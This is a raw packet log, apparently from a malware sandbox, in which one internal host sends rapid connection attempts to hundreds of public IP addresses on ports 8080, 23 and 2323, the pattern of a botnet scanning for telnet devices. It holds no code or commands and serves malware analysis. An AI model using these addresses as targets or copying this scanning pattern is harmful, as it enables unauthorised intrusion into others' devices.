                                                              Nov 13, 2023 22:17:58.737075090 CET139488080192.168.2.2394.97.112.99
                                                              Nov 13, 2023 22:17:58.737075090 CET139488080192.168.2.2331.181.159.174
                                                              Nov 13, 2023 22:17:58.737081051 CET139488080192.168.2.2385.132.47.221
                                                              Nov 13, 2023 22:17:58.737085104 CET139488080192.168.2.2394.173.59.212
                                                              Nov 13, 2023 22:17:58.737097025 CET139488080192.168.2.2331.252.225.69
                                                              Nov 13, 2023 22:17:58.737099886 CET139488080192.168.2.2362.11.179.147
                                                              Nov 13, 2023 22:17:58.737116098 CET139488080192.168.2.2362.182.245.108
                                                              Nov 13, 2023 22:17:58.737117052 CET139488080192.168.2.2395.177.116.179
                                                              Nov 13, 2023 22:17:58.737117052 CET139488080192.168.2.2394.248.173.135
                                                              Nov 13, 2023 22:17:58.737118006 CET139488080192.168.2.2394.69.177.116
                                                              Nov 13, 2023 22:17:58.737118006 CET139488080192.168.2.2394.245.13.144
                                                              Nov 13, 2023 22:17:58.737121105 CET139488080192.168.2.2331.194.40.198
                                                              Nov 13, 2023 22:17:58.737133980 CET139488080192.168.2.2331.89.163.213
                                                              Nov 13, 2023 22:17:58.737137079 CET139488080192.168.2.2394.141.21.237
                                                              Nov 13, 2023 22:17:58.737157106 CET139488080192.168.2.2362.163.214.192
                                                              Nov 13, 2023 22:17:58.737157106 CET139488080192.168.2.2362.127.14.47
                                                              Nov 13, 2023 22:17:58.737157106 CET139488080192.168.2.2394.100.144.250
                                                              Nov 13, 2023 22:17:58.737157106 CET139488080192.168.2.2395.28.173.154
                                                              Nov 13, 2023 22:17:58.737159967 CET139488080192.168.2.2385.21.209.160
                                                              Nov 13, 2023 22:17:58.737159967 CET139488080192.168.2.2385.144.105.69
                                                              Nov 13, 2023 22:17:58.737180948 CET139488080192.168.2.2394.53.240.48
                                                              Nov 13, 2023 22:17:58.737180948 CET139488080192.168.2.2362.130.152.151
                                                              Nov 13, 2023 22:17:58.766099930 CET1138823192.168.2.2334.199.161.151
                                                              Nov 13, 2023 22:17:58.766099930 CET113882323192.168.2.23163.139.152.95
                                                              Nov 13, 2023 22:17:58.766103983 CET1138823192.168.2.23143.118.111.164
                                                              Nov 13, 2023 22:17:58.766104937 CET1138823192.168.2.23105.17.200.168
                                                              Nov 13, 2023 22:17:58.766118050 CET1138823192.168.2.23142.184.247.24
                                                              Nov 13, 2023 22:17:58.766124964 CET1138823192.168.2.23101.12.221.4
                                                              Nov 13, 2023 22:17:58.766124964 CET1138823192.168.2.23113.7.240.244
                                                              Nov 13, 2023 22:17:58.766124964 CET1138823192.168.2.23174.250.218.205
                                                              Nov 13, 2023 22:17:58.766127110 CET1138823192.168.2.23100.18.220.138
                                                              Nov 13, 2023 22:17:58.766127110 CET1138823192.168.2.23116.40.138.99
                                                              Nov 13, 2023 22:17:58.766127110 CET113882323192.168.2.2373.119.35.152
                                                              Nov 13, 2023 22:17:58.766139030 CET1138823192.168.2.23119.189.135.112
                                                              Nov 13, 2023 22:17:58.766143084 CET1138823192.168.2.2338.186.11.8
                                                              Nov 13, 2023 22:17:58.766145945 CET1138823192.168.2.23220.0.159.73
                                                              Nov 13, 2023 22:17:58.766158104 CET1138823192.168.2.23176.181.107.31
                                                              Nov 13, 2023 22:17:58.766165972 CET1138823192.168.2.23201.21.39.247
                                                              Nov 13, 2023 22:17:58.766175985 CET1138823192.168.2.2361.120.193.149
                                                              Nov 13, 2023 22:17:58.766181946 CET1138823192.168.2.2366.181.113.97
                                                              Nov 13, 2023 22:17:58.766187906 CET113882323192.168.2.23107.71.199.235
                                                              Nov 13, 2023 22:17:58.766202927 CET1138823192.168.2.23108.172.189.98
                                                              Nov 13, 2023 22:17:58.766205072 CET1138823192.168.2.23109.139.43.175
                                                              Nov 13, 2023 22:17:58.766205072 CET1138823192.168.2.23157.170.164.162
                                                              Nov 13, 2023 22:17:58.766213894 CET1138823192.168.2.23183.155.28.129
                                                              Nov 13, 2023 22:17:58.766213894 CET1138823192.168.2.23176.197.178.134
                                                              Nov 13, 2023 22:17:58.766225100 CET1138823192.168.2.231.84.228.60
                                                              Nov 13, 2023 22:17:58.766227007 CET1138823192.168.2.23194.185.220.237
                                                              Nov 13, 2023 22:17:58.766237020 CET1138823192.168.2.23102.56.152.153
                                                              Nov 13, 2023 22:17:58.766244888 CET1138823192.168.2.2350.202.248.211
                                                              Nov 13, 2023 22:17:58.766247034 CET1138823192.168.2.23112.229.168.52
                                                              Nov 13, 2023 22:17:58.766247034 CET1138823192.168.2.23168.187.246.193
                                                              Nov 13, 2023 22:17:58.766247034 CET1138823192.168.2.23216.88.114.18
                                                              Nov 13, 2023 22:17:58.766247034 CET1138823192.168.2.2372.15.252.93
                                                              Nov 13, 2023 22:17:58.766247034 CET1138823192.168.2.2397.80.237.109
                                                              Nov 13, 2023 22:17:58.766247034 CET113882323192.168.2.2395.231.17.237
                                                              Nov 13, 2023 22:17:58.766254902 CET1138823192.168.2.23184.88.54.25
                                                              Nov 13, 2023 22:17:58.766247988 CET1138823192.168.2.23155.24.44.54
                                                              Nov 13, 2023 22:17:58.766256094 CET1138823192.168.2.2312.111.192.235
                                                              Nov 13, 2023 22:17:58.766264915 CET1138823192.168.2.2325.171.164.56
                                                              Nov 13, 2023 22:17:58.766278028 CET1138823192.168.2.2395.31.183.248
                                                              Nov 13, 2023 22:17:58.766278028 CET1138823192.168.2.2373.218.26.138
                                                              Nov 13, 2023 22:17:58.766278028 CET1138823192.168.2.23200.66.96.202
                                                              Nov 13, 2023 22:17:58.766287088 CET1138823192.168.2.23124.186.153.84
                                                              Nov 13, 2023 22:17:58.766287088 CET1138823192.168.2.23164.76.149.219
                                                              Nov 13, 2023 22:17:58.766309977 CET1138823192.168.2.23173.248.45.98
                                                              Nov 13, 2023 22:17:58.766310930 CET113882323192.168.2.2339.124.68.227
                                                              Nov 13, 2023 22:17:58.766310930 CET1138823192.168.2.2380.38.93.109
                                                              Nov 13, 2023 22:17:58.766309977 CET113882323192.168.2.23137.67.138.100
                                                              Nov 13, 2023 22:17:58.766309977 CET1138823192.168.2.2381.186.86.176
                                                              Nov 13, 2023 22:17:58.766309977 CET1138823192.168.2.23153.133.74.67
                                                              Nov 13, 2023 22:17:58.766310930 CET1138823192.168.2.2319.254.191.37
                                                              Nov 13, 2023 22:17:58.766310930 CET1138823192.168.2.23191.66.235.241
                                                              Nov 13, 2023 22:17:58.766310930 CET1138823192.168.2.2325.87.215.106
                                                              Nov 13, 2023 22:17:58.766319036 CET1138823192.168.2.23174.123.17.75
                                                              Nov 13, 2023 22:17:58.766319990 CET1138823192.168.2.2323.59.94.95
                                                              Nov 13, 2023 22:17:58.766320944 CET1138823192.168.2.23199.146.37.202
                                                              Nov 13, 2023 22:17:58.766336918 CET113882323192.168.2.2324.96.117.60
                                                              Nov 13, 2023 22:17:58.766345978 CET1138823192.168.2.23110.193.149.193
                                                              Nov 13, 2023 22:17:58.766345978 CET1138823192.168.2.2396.60.166.189
                                                              Nov 13, 2023 22:17:58.766345978 CET1138823192.168.2.2342.241.133.83
                                                              Nov 13, 2023 22:17:58.766351938 CET1138823192.168.2.23198.136.45.2
                                                              Nov 13, 2023 22:17:58.766351938 CET1138823192.168.2.23120.36.136.251
                                                              Nov 13, 2023 22:17:58.766357899 CET1138823192.168.2.2397.175.209.11
                                                              Nov 13, 2023 22:17:58.766359091 CET1138823192.168.2.2368.167.138.138
                                                              Nov 13, 2023 22:17:58.766359091 CET1138823192.168.2.23137.194.157.103
                                                              Nov 13, 2023 22:17:58.766359091 CET1138823192.168.2.23108.60.62.181
                                                              Nov 13, 2023 22:17:58.766359091 CET1138823192.168.2.2363.222.188.59
                                                              Nov 13, 2023 22:17:58.766370058 CET1138823192.168.2.2312.27.148.221
                                                              Nov 13, 2023 22:17:58.766370058 CET1138823192.168.2.234.186.205.59
                                                              Nov 13, 2023 22:17:58.766377926 CET1138823192.168.2.23122.32.138.131
                                                              Nov 13, 2023 22:17:58.766383886 CET113882323192.168.2.231.95.236.119
                                                              Nov 13, 2023 22:17:58.766386032 CET1138823192.168.2.23202.213.91.101
                                                              Nov 13, 2023 22:17:58.766396999 CET1138823192.168.2.2371.225.140.181
                                                              Nov 13, 2023 22:17:58.766402960 CET1138823192.168.2.23148.75.68.125
                                                              Nov 13, 2023 22:17:58.766402960 CET1138823192.168.2.23196.247.189.188
                                                              Nov 13, 2023 22:17:58.766407013 CET1138823192.168.2.2382.58.25.163
                                                              Nov 13, 2023 22:17:58.766407013 CET1138823192.168.2.23220.236.70.195
                                                              Nov 13, 2023 22:17:58.766407013 CET1138823192.168.2.23195.223.239.179
                                                              Nov 13, 2023 22:17:58.766407013 CET1138823192.168.2.23176.245.90.102
                                                              Nov 13, 2023 22:17:58.766407013 CET1138823192.168.2.23106.237.180.29
                                                              Nov 13, 2023 22:17:58.766411066 CET113882323192.168.2.2361.58.91.101
                                                              Nov 13, 2023 22:17:58.766418934 CET1138823192.168.2.23145.241.127.227
                                                              Nov 13, 2023 22:17:58.766418934 CET1138823192.168.2.2393.188.231.70
                                                              Nov 13, 2023 22:17:58.766433001 CET1138823192.168.2.2342.196.88.183
                                                              Nov 13, 2023 22:17:58.766433954 CET1138823192.168.2.23221.239.61.185
                                                              Nov 13, 2023 22:17:58.766447067 CET1138823192.168.2.23190.243.195.79
                                                              Nov 13, 2023 22:17:58.766449928 CET1138823192.168.2.23100.19.70.38
                                                              Nov 13, 2023 22:17:58.766449928 CET1138823192.168.2.23103.234.142.48
                                                              Nov 13, 2023 22:17:58.766449928 CET1138823192.168.2.23148.76.209.121
                                                              Nov 13, 2023 22:17:58.766454935 CET1138823192.168.2.2357.191.35.179
                                                              Nov 13, 2023 22:17:58.766458035 CET1138823192.168.2.23151.182.91.36
                                                              Nov 13, 2023 22:17:58.766458035 CET113882323192.168.2.2318.6.244.62
                                                              Nov 13, 2023 22:17:58.766479015 CET1138823192.168.2.23198.75.188.204
                                                              Nov 13, 2023 22:17:58.766479015 CET1138823192.168.2.23148.162.214.130
                                                              Nov 13, 2023 22:17:58.766480923 CET1138823192.168.2.2374.40.159.83
                                                              Nov 13, 2023 22:17:58.766491890 CET1138823192.168.2.2385.238.75.150
                                                              Nov 13, 2023 22:17:58.766491890 CET1138823192.168.2.2339.91.169.230
                                                              Nov 13, 2023 22:17:58.766491890 CET1138823192.168.2.23189.94.91.121
                                                              Nov 13, 2023 22:17:58.766491890 CET1138823192.168.2.23207.63.10.228
                                                              Nov 13, 2023 22:17:58.766494036 CET1138823192.168.2.23202.29.115.198
                                                              Nov 13, 2023 22:17:58.766494036 CET1138823192.168.2.23210.132.198.184
                                                              Nov 13, 2023 22:17:58.766510010 CET113882323192.168.2.2379.208.162.172
                                                              Nov 13, 2023 22:17:58.766521931 CET1138823192.168.2.23172.185.149.218
                                                              Nov 13, 2023 22:17:58.766522884 CET1138823192.168.2.2337.1.171.204
                                                              Nov 13, 2023 22:17:58.766521931 CET1138823192.168.2.2367.106.139.90
                                                              Nov 13, 2023 22:17:58.766522884 CET1138823192.168.2.2343.173.103.113
                                                              Nov 13, 2023 22:17:58.766525030 CET1138823192.168.2.23115.33.162.81
                                                              Nov 13, 2023 22:17:58.766525030 CET1138823192.168.2.2370.167.180.31
                                                              Nov 13, 2023 22:17:58.766539097 CET1138823192.168.2.23176.98.54.19
                                                              Nov 13, 2023 22:17:58.766539097 CET1138823192.168.2.23160.108.128.64
                                                              Nov 13, 2023 22:17:58.766546965 CET113882323192.168.2.23167.91.105.215
                                                              Nov 13, 2023 22:17:58.766560078 CET1138823192.168.2.23181.206.212.157
                                                              Nov 13, 2023 22:17:58.766561031 CET1138823192.168.2.23197.243.202.190
                                                              Nov 13, 2023 22:17:58.766561031 CET1138823192.168.2.23119.36.120.220
                                                              Nov 13, 2023 22:17:58.766562939 CET1138823192.168.2.2339.44.81.27
                                                              Nov 13, 2023 22:17:58.766562939 CET1138823192.168.2.2332.239.230.241
                                                              Nov 13, 2023 22:17:58.766566038 CET1138823192.168.2.23183.210.46.78
                                                              Nov 13, 2023 22:17:58.766566038 CET1138823192.168.2.23206.145.87.219
                                                              Nov 13, 2023 22:17:58.766581059 CET1138823192.168.2.23181.192.117.86
                                                              Nov 13, 2023 22:17:58.766594887 CET1138823192.168.2.23145.223.27.125
                                                              Nov 13, 2023 22:17:58.766596079 CET1138823192.168.2.2383.85.131.33
                                                              Nov 13, 2023 22:17:58.766599894 CET113882323192.168.2.23195.18.195.235
                                                              Nov 13, 2023 22:17:58.766599894 CET1138823192.168.2.23136.42.214.147
                                                              Nov 13, 2023 22:17:58.766608000 CET1138823192.168.2.23168.225.144.230
                                                              Nov 13, 2023 22:17:58.766625881 CET1138823192.168.2.23123.119.31.71
                                                              Nov 13, 2023 22:17:58.766625881 CET1138823192.168.2.23201.134.56.236
                                                              Nov 13, 2023 22:17:58.766628027 CET1138823192.168.2.23142.88.80.126
                                                              Nov 13, 2023 22:17:58.766628981 CET1138823192.168.2.23175.196.38.110
                                                              Nov 13, 2023 22:17:58.766629934 CET1138823192.168.2.23191.111.66.197
                                                              Nov 13, 2023 22:17:58.766629934 CET1138823192.168.2.23212.222.27.125
                                                              Nov 13, 2023 22:17:58.766629934 CET1138823192.168.2.23125.195.211.161
                                                              Nov 13, 2023 22:17:58.766629934 CET113882323192.168.2.2366.139.231.162
                                                              Nov 13, 2023 22:17:58.766632080 CET1138823192.168.2.23191.116.142.27
                                                              Nov 13, 2023 22:17:58.766649008 CET1138823192.168.2.23219.225.60.5
                                                              Nov 13, 2023 22:17:58.766649008 CET1138823192.168.2.23200.125.124.2
                                                              Nov 13, 2023 22:17:58.766650915 CET1138823192.168.2.2344.26.117.133
                                                              Nov 13, 2023 22:17:58.766664982 CET1138823192.168.2.2366.243.158.119
                                                              Nov 13, 2023 22:17:58.766665936 CET1138823192.168.2.23108.107.209.118
                                                              Nov 13, 2023 22:17:58.766665936 CET1138823192.168.2.23117.35.147.21
                                                              Nov 13, 2023 22:17:58.766665936 CET1138823192.168.2.23117.145.189.173
                                                              Nov 13, 2023 22:17:58.766669035 CET1138823192.168.2.2313.204.27.126
                                                              Nov 13, 2023 22:17:58.766670942 CET113882323192.168.2.2388.233.225.64
                                                              Nov 13, 2023 22:17:58.766670942 CET1138823192.168.2.2378.41.238.135
                                                              Nov 13, 2023 22:17:58.766681910 CET1138823192.168.2.2396.153.49.70
                                                              Nov 13, 2023 22:17:58.766681910 CET1138823192.168.2.23219.47.143.89
                                                              Nov 13, 2023 22:17:58.766690016 CET1138823192.168.2.2348.12.69.39
                                                              Nov 13, 2023 22:17:58.766690969 CET1138823192.168.2.2394.190.140.1
                                                              Nov 13, 2023 22:17:58.766695023 CET1138823192.168.2.2325.222.119.32
                                                              Nov 13, 2023 22:17:58.766709089 CET1138823192.168.2.2343.88.128.213
                                                              Nov 13, 2023 22:17:58.766710043 CET1138823192.168.2.2384.28.178.79
                                                              Nov 13, 2023 22:17:58.766711950 CET113882323192.168.2.23220.18.127.22
                                                              Nov 13, 2023 22:17:58.766711950 CET1138823192.168.2.238.51.223.43
                                                              Nov 13, 2023 22:17:58.766711950 CET1138823192.168.2.23144.149.228.78
                                                              Nov 13, 2023 22:17:58.766714096 CET1138823192.168.2.2332.222.89.136
                                                              Nov 13, 2023 22:17:58.766721010 CET1138823192.168.2.2385.101.88.238
                                                              Nov 13, 2023 22:17:58.766721010 CET1138823192.168.2.23109.176.129.67
                                                              Nov 13, 2023 22:17:58.766724110 CET1138823192.168.2.23179.184.172.234
                                                              Nov 13, 2023 22:17:58.766729116 CET1138823192.168.2.23113.210.184.194
                                                              Nov 13, 2023 22:17:58.766742945 CET1138823192.168.2.23111.26.145.122
                                                              Nov 13, 2023 22:17:58.766743898 CET1138823192.168.2.23173.239.171.199
                                                              Nov 13, 2023 22:17:58.766743898 CET1138823192.168.2.2375.58.172.29
                                                              Nov 13, 2023 22:17:58.766746998 CET113882323192.168.2.23204.111.93.162
                                                              Nov 13, 2023 22:17:58.766753912 CET1138823192.168.2.23105.147.240.56
                                                              Nov 13, 2023 22:17:58.766753912 CET1138823192.168.2.23184.239.120.235
                                                              Nov 13, 2023 22:17:58.766753912 CET1138823192.168.2.2353.164.28.247
                                                              Nov 13, 2023 22:17:58.766755104 CET1138823192.168.2.23155.155.101.59
                                                              Nov 13, 2023 22:17:58.766757965 CET1138823192.168.2.23111.210.139.5
                                                              Nov 13, 2023 22:17:58.766763926 CET1138823192.168.2.23115.183.48.132
                                                              Nov 13, 2023 22:17:58.766774893 CET1138823192.168.2.23104.19.15.194
                                                              Nov 13, 2023 22:17:58.766782045 CET113882323192.168.2.23110.112.54.145
                                                              Nov 13, 2023 22:17:58.766784906 CET1138823192.168.2.23190.189.45.29
                                                              Nov 13, 2023 22:17:58.766788006 CET1138823192.168.2.2338.10.139.60
                                                              Nov 13, 2023 22:17:58.766799927 CET1138823192.168.2.23219.24.155.72
                                                              Nov 13, 2023 22:17:58.766803980 CET1138823192.168.2.2381.55.157.213
                                                              Nov 13, 2023 22:17:58.766805887 CET1138823192.168.2.23174.138.162.255
                                                              Nov 13, 2023 22:17:58.766807079 CET1138823192.168.2.23131.126.120.174
                                                              Nov 13, 2023 22:17:58.766808987 CET1138823192.168.2.2391.209.101.197
                                                              Nov 13, 2023 22:17:58.766808987 CET1138823192.168.2.2380.186.72.108
                                                              Nov 13, 2023 22:17:58.766824007 CET1138823192.168.2.23154.16.90.75
                                                              Nov 13, 2023 22:17:58.766824007 CET1138823192.168.2.2320.74.78.239
                                                              Nov 13, 2023 22:17:58.766825914 CET1138823192.168.2.23185.120.236.183
                                                              Nov 13, 2023 22:17:58.766825914 CET1138823192.168.2.23120.122.167.87
                                                              Nov 13, 2023 22:17:58.766825914 CET113882323192.168.2.2331.29.134.92
                                                              Nov 13, 2023 22:17:58.766840935 CET1138823192.168.2.2377.76.18.5
                                                              Nov 13, 2023 22:17:58.766850948 CET1138823192.168.2.23153.173.0.124
                                                              Nov 13, 2023 22:17:58.766851902 CET1138823192.168.2.23104.139.84.135
                                                              Nov 13, 2023 22:17:58.766851902 CET1138823192.168.2.2358.69.203.215
                                                              Nov 13, 2023 22:17:58.766851902 CET1138823192.168.2.23135.187.248.113
                                                              Nov 13, 2023 22:17:58.766851902 CET1138823192.168.2.2324.20.15.209
                                                              Nov 13, 2023 22:17:58.766856909 CET1138823192.168.2.23216.201.250.113
                                                              Nov 13, 2023 22:17:58.766870975 CET1138823192.168.2.23150.49.7.94
                                                              Nov 13, 2023 22:17:58.766874075 CET113882323192.168.2.2358.146.46.53
                                                              Nov 13, 2023 22:17:58.766875029 CET1138823192.168.2.23137.150.128.95
                                                              Nov 13, 2023 22:17:58.766874075 CET1138823192.168.2.2325.3.233.66
                                                              Nov 13, 2023 22:17:58.766877890 CET1138823192.168.2.23209.197.46.101
                                                              Nov 13, 2023 22:17:58.766885042 CET1138823192.168.2.2394.69.105.188
                                                              Nov 13, 2023 22:17:58.766885042 CET1138823192.168.2.23205.242.73.23
                                                              Nov 13, 2023 22:17:58.766890049 CET1138823192.168.2.2398.64.133.231
                                                              Nov 13, 2023 22:17:58.766890049 CET1138823192.168.2.23103.243.23.15
                                                              Nov 13, 2023 22:17:58.766894102 CET1138823192.168.2.23184.159.204.80
                                                              Nov 13, 2023 22:17:58.766908884 CET113882323192.168.2.231.180.152.50
                                                              Nov 13, 2023 22:17:58.766908884 CET1138823192.168.2.2395.116.50.60
                                                              Nov 13, 2023 22:17:58.766910076 CET1138823192.168.2.23174.146.43.96
                                                              Nov 13, 2023 22:17:58.766910076 CET1138823192.168.2.23181.165.103.195
                                                              Nov 13, 2023 22:17:58.766921997 CET1138823192.168.2.2362.34.11.35
                                                              Nov 13, 2023 22:17:58.766921997 CET1138823192.168.2.23115.103.222.173
                                                              Nov 13, 2023 22:17:58.766927958 CET1138823192.168.2.2351.172.237.154
                                                              Nov 13, 2023 22:17:58.766928911 CET1138823192.168.2.23135.178.81.34
                                                              Nov 13, 2023 22:17:58.766935110 CET1138823192.168.2.2317.159.144.252
                                                              Nov 13, 2023 22:17:58.766935110 CET1138823192.168.2.23110.152.190.62
                                                              Nov 13, 2023 22:17:58.766935110 CET1138823192.168.2.2340.148.121.209
                                                              Nov 13, 2023 22:17:58.766936064 CET113882323192.168.2.2378.199.33.166
                                                              Nov 13, 2023 22:17:58.766938925 CET1138823192.168.2.23205.32.199.238
                                                              Nov 13, 2023 22:17:58.766953945 CET1138823192.168.2.23216.212.250.57
                                                              Nov 13, 2023 22:17:58.766953945 CET1138823192.168.2.23200.245.185.90
                                                              Nov 13, 2023 22:17:58.766957998 CET1138823192.168.2.2331.18.182.173
                                                              Nov 13, 2023 22:17:58.766959906 CET1138823192.168.2.2398.128.17.152
                                                              Nov 13, 2023 22:17:58.766969919 CET1138823192.168.2.23159.63.165.122
                                                              Nov 13, 2023 22:17:58.766971111 CET1138823192.168.2.2358.140.104.204
                                                              Nov 13, 2023 22:17:58.766973972 CET1138823192.168.2.23189.194.125.185
                                                              Nov 13, 2023 22:17:58.766988039 CET113882323192.168.2.23140.58.249.6
                                                              Nov 13, 2023 22:17:58.766988039 CET1138823192.168.2.23143.156.85.76
                                                              Nov 13, 2023 22:17:58.767004013 CET1138823192.168.2.23141.138.204.233
                                                              Nov 13, 2023 22:17:58.767014027 CET1138823192.168.2.2324.182.40.53
                                                              Nov 13, 2023 22:17:58.767033100 CET1138823192.168.2.23203.43.148.192
                                                              Nov 13, 2023 22:17:58.767035961 CET1138823192.168.2.2348.96.11.166
                                                              Nov 13, 2023 22:17:58.767035961 CET113882323192.168.2.2337.101.211.200
                                                              Nov 13, 2023 22:17:58.767044067 CET1138823192.168.2.2377.202.44.129
                                                              Nov 13, 2023 22:17:58.767044067 CET1138823192.168.2.2391.60.33.171
                                                              Nov 13, 2023 22:17:58.767045021 CET1138823192.168.2.2365.39.113.28
                                                              Nov 13, 2023 22:17:58.767045021 CET1138823192.168.2.23216.106.59.43
                                                              Nov 13, 2023 22:17:58.767044067 CET1138823192.168.2.2392.39.190.4
                                                              Nov 13, 2023 22:17:58.767049074 CET1138823192.168.2.23193.188.230.138
                                                              Nov 13, 2023 22:17:58.767049074 CET1138823192.168.2.23169.106.21.182
                                                              Nov 13, 2023 22:17:58.767049074 CET1138823192.168.2.2392.81.119.244
                                                              Nov 13, 2023 22:17:58.767055035 CET1138823192.168.2.23155.130.215.168
                                                              Nov 13, 2023 22:17:58.767055035 CET1138823192.168.2.23223.234.99.2
                                                              Nov 13, 2023 22:17:58.767074108 CET1138823192.168.2.2377.13.203.83
                                                              Nov 13, 2023 22:17:58.767077923 CET1138823192.168.2.23184.77.81.2
                                                              Nov 13, 2023 22:17:58.767082930 CET1138823192.168.2.23103.227.148.63
                                                              Nov 13, 2023 22:17:58.767085075 CET1138823192.168.2.2397.38.62.182
                                                              Nov 13, 2023 22:17:58.767087936 CET1138823192.168.2.23107.227.251.41
                                                              Nov 13, 2023 22:17:58.767091036 CET1138823192.168.2.23102.51.16.44
                                                              Nov 13, 2023 22:17:58.767091036 CET1138823192.168.2.23140.168.249.1
                                                              Nov 13, 2023 22:17:58.767091990 CET113882323192.168.2.23205.46.242.113
                                                              Nov 13, 2023 22:17:58.767096043 CET1138823192.168.2.2345.146.1.183
                                                              Nov 13, 2023 22:17:58.767096043 CET1138823192.168.2.23163.127.77.59
                                                              Nov 13, 2023 22:17:58.767102003 CET1138823192.168.2.238.140.254.61
                                                              Nov 13, 2023 22:17:58.767117023 CET1138823192.168.2.23155.82.118.148
                                                              Nov 13, 2023 22:17:58.767117023 CET1138823192.168.2.23176.26.103.237
                                                              Nov 13, 2023 22:17:58.767117023 CET1138823192.168.2.23152.241.171.187
                                                              Nov 13, 2023 22:17:58.767127991 CET1138823192.168.2.2394.216.33.205
                                                              Nov 13, 2023 22:17:58.767137051 CET113882323192.168.2.2366.70.61.200
                                                              Nov 13, 2023 22:17:58.767137051 CET1138823192.168.2.2335.217.246.33
                                                              Nov 13, 2023 22:17:58.767143011 CET1138823192.168.2.2383.230.251.149
                                                              Nov 13, 2023 22:17:58.767143011 CET1138823192.168.2.23201.157.91.80
                                                              Nov 13, 2023 22:17:58.767151117 CET1138823192.168.2.23207.250.109.34
                                                              Nov 13, 2023 22:17:58.767155886 CET1138823192.168.2.23181.200.80.86
                                                              Nov 13, 2023 22:17:58.767159939 CET1138823192.168.2.23158.109.214.128
                                                              Nov 13, 2023 22:17:58.767163992 CET1138823192.168.2.23102.162.172.153
                                                              Nov 13, 2023 22:17:58.767168999 CET113882323192.168.2.23152.113.31.54
                                                              Nov 13, 2023 22:17:58.767178059 CET1138823192.168.2.2339.113.55.170
                                                              Nov 13, 2023 22:17:58.767184973 CET1138823192.168.2.2343.232.44.125
                                                              Nov 13, 2023 22:17:58.767190933 CET1138823192.168.2.2393.125.200.247
                                                              Nov 13, 2023 22:17:58.767194033 CET1138823192.168.2.23207.222.62.14
                                                              Nov 13, 2023 22:17:58.767194033 CET1138823192.168.2.23212.75.142.34
                                                              Nov 13, 2023 22:17:58.767208099 CET1138823192.168.2.2327.64.240.55
                                                              Nov 13, 2023 22:17:58.767214060 CET1138823192.168.2.23186.126.78.103
                                                              Nov 13, 2023 22:17:58.767214060 CET1138823192.168.2.2381.227.33.54
                                                              Nov 13, 2023 22:17:58.767214060 CET1138823192.168.2.23171.161.48.27
                                                              Nov 13, 2023 22:17:58.767215014 CET1138823192.168.2.23204.89.18.76
                                                              Nov 13, 2023 22:17:58.767220020 CET113882323192.168.2.23198.117.15.48
                                                              Nov 13, 2023 22:17:58.767225981 CET1138823192.168.2.2381.232.55.76
                                                              Nov 13, 2023 22:17:58.767236948 CET1138823192.168.2.23139.145.248.204
                                                              Nov 13, 2023 22:17:58.767236948 CET1138823192.168.2.23223.99.217.80
                                                              Nov 13, 2023 22:17:58.767236948 CET1138823192.168.2.23130.170.167.99
                                                              Nov 13, 2023 22:17:58.767241001 CET1138823192.168.2.2358.213.66.174
                                                              Nov 13, 2023 22:17:58.767241001 CET1138823192.168.2.23136.166.114.103
                                                              Nov 13, 2023 22:17:58.767241955 CET1138823192.168.2.23206.151.127.119
                                                              Nov 13, 2023 22:17:58.767245054 CET1138823192.168.2.2373.245.179.94
                                                              Nov 13, 2023 22:17:58.767252922 CET1138823192.168.2.23111.58.77.75
                                                              Nov 13, 2023 22:17:58.767252922 CET113882323192.168.2.23123.102.235.52
                                                              Nov 13, 2023 22:17:58.767257929 CET1138823192.168.2.23159.205.51.240
                                                              Nov 13, 2023 22:17:58.767271042 CET1138823192.168.2.2354.165.67.192
                                                              Nov 13, 2023 22:17:58.767277956 CET1138823192.168.2.23144.224.61.244
                                                              Nov 13, 2023 22:17:58.767277956 CET1138823192.168.2.23130.225.162.241
                                                              Nov 13, 2023 22:17:58.767283916 CET1138823192.168.2.23170.115.141.20
                                                              Nov 13, 2023 22:17:58.767283916 CET1138823192.168.2.2339.125.73.248
                                                              Nov 13, 2023 22:17:58.767288923 CET1138823192.168.2.23112.180.44.43
                                                              Nov 13, 2023 22:17:58.767292023 CET1138823192.168.2.23163.115.7.201
                                                              Nov 13, 2023 22:17:58.767293930 CET113882323192.168.2.2341.108.7.226
                                                              Nov 13, 2023 22:17:58.767297983 CET1138823192.168.2.23212.235.159.205
                                                              Nov 13, 2023 22:17:58.767303944 CET1138823192.168.2.2337.225.145.114
                                                              Nov 13, 2023 22:17:58.767319918 CET1138823192.168.2.23140.163.178.241
                                                              Nov 13, 2023 22:17:58.767319918 CET1138823192.168.2.23155.18.24.126
                                                              Nov 13, 2023 22:17:58.767319918 CET1138823192.168.2.2397.164.50.94
                                                              Nov 13, 2023 22:17:58.767327070 CET1138823192.168.2.23173.98.238.23
                                                              Nov 13, 2023 22:17:58.767330885 CET1138823192.168.2.23191.222.4.20
                                                              Nov 13, 2023 22:17:58.767338991 CET1138823192.168.2.23105.222.55.235
                                                              Nov 13, 2023 22:17:58.767338991 CET1138823192.168.2.2389.17.123.30
                                                              Nov 13, 2023 22:17:58.767342091 CET1138823192.168.2.2340.201.102.143
                                                              Nov 13, 2023 22:17:58.767349005 CET1138823192.168.2.2370.19.79.62
                                                              Nov 13, 2023 22:17:58.767357111 CET1138823192.168.2.2367.84.210.51
                                                              Nov 13, 2023 22:17:58.767358065 CET113882323192.168.2.2323.199.227.74
                                                              Nov 13, 2023 22:17:58.767378092 CET1138823192.168.2.2351.28.255.83
                                                              Nov 13, 2023 22:17:58.767378092 CET1138823192.168.2.23116.219.62.234
                                                              Nov 13, 2023 22:17:58.767379045 CET1138823192.168.2.23191.95.50.82
                                                              Nov 13, 2023 22:17:58.767379999 CET1138823192.168.2.2339.69.6.44
                                                              Nov 13, 2023 22:17:58.767379045 CET1138823192.168.2.239.4.130.4
                                                              Nov 13, 2023 22:17:58.767383099 CET1138823192.168.2.2395.111.133.113
                                                              Nov 13, 2023 22:17:58.767390013 CET1138823192.168.2.23174.133.153.11
                                                              Nov 13, 2023 22:17:58.767391920 CET113882323192.168.2.2375.189.63.241
                                                              Nov 13, 2023 22:17:58.767400026 CET1138823192.168.2.23178.116.240.211
                                                              Nov 13, 2023 22:17:58.767402887 CET1138823192.168.2.2313.233.9.186
                                                              Nov 13, 2023 22:17:58.767410994 CET1138823192.168.2.2365.120.247.242
                                                              Nov 13, 2023 22:17:58.767410994 CET1138823192.168.2.23216.129.134.124
                                                              Nov 13, 2023 22:17:58.767411947 CET1138823192.168.2.23171.0.134.220
                                                              Nov 13, 2023 22:17:58.767410994 CET1138823192.168.2.23144.192.206.110
                                                              Nov 13, 2023 22:17:58.767411947 CET1138823192.168.2.23101.237.38.247
                                                              Nov 13, 2023 22:17:58.767412901 CET1138823192.168.2.2374.106.169.25
